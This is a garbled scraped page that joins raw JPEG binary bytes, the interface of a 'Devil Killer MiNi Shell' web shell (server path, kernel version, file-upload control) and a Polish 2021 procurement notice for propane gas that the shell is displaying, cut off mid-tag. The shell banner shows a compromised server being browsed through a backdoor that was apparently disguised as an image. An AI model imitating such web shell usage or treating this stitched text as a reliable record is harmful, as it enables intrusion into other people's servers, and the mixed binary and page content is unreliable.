JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210923/0018962201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa gazu propan do celów grzewczych na potrzeby Wydziału Ujęcia Wody w „PGKiM” Sp. z o.o. w Aleksandrowie Łódzkim” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&quot;PGKiM&quot; Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 471694644</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja 28/30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Aleksandrów Łódzki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-070</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam_publiczne@pgkimal.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">ww.pgkimal.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa gazu propan do celów grzewczych na potrzeby Wydziału Ujęcia Wody w „PGKiM” Sp. z o.o. w Aleksandrowie Łódzkim” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e25875bb-1c42-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00189622</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pgkimal <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pgkimal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/pgkimal<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między Zamawiającym a<br/>Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane<br/>były w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość<br/>do Zamawiającego”.<br/>3. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do Zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do<br/>Zamawiającego.<br/>4. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie<br/>w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl do konkretnego Wykonawcy.<br/>5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>bezpośrednio na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej w zakładce „Regulamin" oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na stronie internetowej.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z<br/>treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość<br/>do Zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w<br/>przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy.<br/>8. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl znajdują się w zakładce<br/>„Instrukcje dla Wykonawców" na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>9. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem<br/>Prezesa Rady Ministrów z 09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych.Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg). W<br/>celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip<br/>i .7Z<br/>10. Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem<br/>formularza “Wyślij wiadomość do Zamawiającego”, nie za pośrednictwem adresu email.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych jest „PGKiM” Sp. z<br/>o.o., z siedzibą w Aleksandrowie Łódzkim, 95-070 Aleksandrów Łódzki, ul. Maja 28/30.<br/>2. Spółka „PGKiM” wyznaczyła inspektora ochrony danych, z którym można się skontaktować przez email<br/>iod@pgkimal.pl, tel. 42 652-35-01 w. 71, pokój 37 w każdej sprawie dotyczącej przetwarzania<br/>Pani/Pana danych osobowych.<br/>3. Przetwarzanie danych osobowych odbywa się w związku z pełnieniem przez Prezesa Zarządu<br/>obowiązków kierownika zamawiającego w postępowaniach o udzielenie zamówienia publicznego, w<br/>tym między innymi niniejszego postępowania.<br/>4. Podanie danych osobowych jest warunkiem koniecznym do udziału w postępowaniu o udzielenie<br/>zamówienia publicznego. Przetwarzanie danych osobowych odbywa się na podstawie przepisów<br/>prawa:<br/>a. ogólną podstawę do przetwarzania danych stanowi art. 6 ust. 1 lit. C Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE;<br/>b. szczegółowe cele przetwarzania danych zostały wskazane w ustawie z dnia 29 stycznia 2004 r.<br/>Prawo zamówień publicznych (Dz.U z 2018 r. poz. 1986 ze zm.).<br/>5. Zgodnie z art. 96 ust. 3 Ustawy, „PGKiM” udostępnia dane złożone w czasie postępowania o<br/>udzielenia zamówień publicznych w terminach i formie tam wskazanej – poprzez publikację na stronie<br/>lub na wniosek osób zainteresowanych.<br/>6. „PGKiM” może przekazać dane osobowe:<br/>a. organom uprawnionym do otrzymania Pani/Pana danych na podstawie przepisów prawa,<br/>b. operatorom pocztowym i kurierom,<br/>c. dostawcom systemów informatycznych i usług IT uczestniczącym w procesach koniecznych do<br/>wykonywania umowy,<br/>d. firmom wykonującym usługi dla „PGKiM” na podstawie umowy powierzenia przetwarzania danych<br/>osobowych,<br/>e. Wykonawcom biorącym udział w postępowaniach o udzielenie zamówienia publicznego.<br/>7. Dane osobowe będą przetwarzane w „PGKiM” do czasu niezbędnego do realizacji zadań, a<br/>następnie przekazywane do archiwum zakładowego i tam przechowywane odpowiednio -<br/>dokumentacja z postępowania o udzielenie zamówień publicznych – przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>8. Każdy ma prawo do dostępu do swoich danych osobowych, ich poprawiania, kontroli oraz prawo<br/>żądania ograniczenia przetwarzania. Prawo do przenoszenia danych oraz prawa wniesienia sprzeciwu<br/>wobec przetwarzania danych osobowych z uwagi na konieczność wywiązywania się z obowiązków<br/>przewidzianych w ustawie Pzp oraz dla celów ustalenia, dochodzenia lub obrony roszczeń oraz celów<br/>archiwalnych nie przysługuje, a w szczególności:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO<br/>10. Dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>11. Wykonawca, wypełniając obowiązki informacyjne wynikający z art. 13 lub art. 14 RODO względem<br/>osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o<br/>udzielenie zamówienia publicznego w tym postępowaniu składa stosowne oświadczenie zawarte w<br/>Formularzu ofertowym.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">06/OZ/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem Zamówienia jest: dostawa gazu płynnego propan do celów grzewczych spełniającego parametry CN 27111297 - Propan o czystości <= 99%, skroplony lub CN 27111294 - Propan o czystości > 90%, ale < 99%, skroplony dla Wydziału Ujęcia Wody „PGKiM” Sp. z o.o. w Aleksandrowie Łódzkim w ilości 7000 litrów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09122000-0 - Propan i butan</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje udzielenia zamówień dodatkowych o których mowa w art. 214 ust 1 pkt 8. ustawy Pzp. (w razie konieczności zakupu większej ilości, np. sroga zima). <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Przy dokonywaniu wyboru najkorzystniejszej Zamawiający będzie kierował się kryteriami:<br/>a)	Kryterium: cena 100 % cena – maksymalnie 100 pkt<br/>W ramach kryterium „cena” Zamawiający będzie przyznawał punkty (P1) zgodnie z poniższym wzorem:<br/>P1 = ( Cmin/Ci) *100 pkt<br/>gdzie:<br/>P1 – ilość punktów jakie otrzyma oferta oceniana<br/>Cmin – najniższa cena spośród ocenianych ofert<br/>Ci – cena oferty ocenianej<br/>Ilość punktów będzie obliczana do dwóch miejsc po przecinku.<br/>Niniejsze zamówienie zostanie udzielone temu wykonawcy, który uzyska największą ilość punktów (maksymalnie 100 pkt).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą wraz z ofertą<br/>oświadczenia (zał. 2 i<br/>2A), a wskazany Wykonawca na żądanie Zamawiającego w terminie nie krótszym niż 5 dni od<br/>wezwania,<br/>przedłoży wymagane w SWZ dokumenty w zakresie:<br/>1) spełnienia warunków udziału w postępowaniu<br/>2) niepodlegania wykluczeniu<br/>2. Oświadczenia o których mowa w ust. 1 należy złożyć zgodnie z odpowiednim wzorem<br/>stanowiącym<br/>załączniki do SWZ. Oświadczenia te dla podmiotów składających ofertę wspólnie oraz<br/>podmiotów<br/>udostępniających zasoby składane są oddzielnie dla każdego z tych podmiotów. Oświadczenia<br/>wraz z<br/>ofertą składane są w formie elektronicznej opatrzone kwalifikowanym podpisem elektronicznym<br/>lub<br/>postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym.<br/>3. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ilewynika to z<br/>odrębnych przepisów.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu należy<br/>złożyć:<br/>1) Aktualną koncesję na prowadzenie działalności gospodarczej w zakresie obrotu gazem<br/>4. Zdolność techniczna lub zawodowa:<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu,<br/>Zamawiający<br/>żąda następujących podmiotowych środków dowodowych w zakresie:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym<br/>zakresie.<br/>Zamawiający nie dokona oceny spełnienia tego warunków udziału w postępowaniu.<br/>5. Sytuacja ekonomiczna i finansowa:<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>Zamawiający<br/>żąda złożenia następujących podmiotowych środków dowodowych:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą na<br/>wezwanie Zamawiającego w<br/>terminie nie krótszym niż 5 dni od dnia wezwania, składa podmiotowe środki dowodowe na<br/>potwierdzenie spełniania warunków udziału w postępowaniu i braku podstaw wykluczenia:<br/>1) Aktualna koncesja na prowadzenie działalności gospodarczej w zakresie obrotu gazem<br/>2. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>„PGKiM” Sp. z o.o. – Specyfikacja Warunków Zamówienia<br/>Oznaczenie postępowania:03/OZ/2021<br/>(Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową<br/>lub<br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 5.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest wnieść wadium. Każda składana oferta musi być<br/>zabezpieczona wadium<br/>w wysokości : 130,00<br/>2. Wadium wnosi się przed upływem terminu składania ofert, tj. przed godz. 09:00 w dniu<br/>01.10.2021r.<br/>3. Wadium utrzymuje się nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem<br/>przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>4. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>a) pieniądzu – Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego: BS<br/>Aleksandrów<br/>Łódzki 72 8780 0007 0000 0840 1000 0005<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2019, poz. 310,<br/>836 i<br/>1572).<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 4 lit.<br/>b) – d),<br/>Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej.<br/>6. Wadium powinno być oznaczone w sposób umożliwiający jednoznaczną identyfikację<br/>postępowania,<br/>którego dotyczy.<br/>7. Zamawiający odrzuca ofertę, jeżeli Wykonawca nie wniósł wadium, lub wniósł w sposób<br/>nieprawidłowy<br/>lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek<br/>oz<br/>wrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy.<br/>8. Zapisy art. 98 ustawy Zamawiający stosuje odpowiednio. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze<br/>(konsorcja/spółki<br/>cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień<br/>publicznych, w<br/>tym:<br/>1) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art.58 ust. 2 ustawy Pzp Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia lub pełnomocnictwo do reprezentowania w<br/>postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie w<br/>ofercie<br/>dokumentu zawierającego pełnomocnictwo w celu ustalenia podmiotu uprawnionego do<br/>występowania w imieniu Wykonawców w sposób umożliwiający ich identyfikację.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie,<br/>z którego wynika jaki zakres rzeczowy wykonania zamówienia realizować zamierzają<br/>poszczególni wykonawcy.<br/>3) W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia w<br/>rozdziale VI wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie<br/>dokumentów dla każdego konsorcjanta oddzielnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span 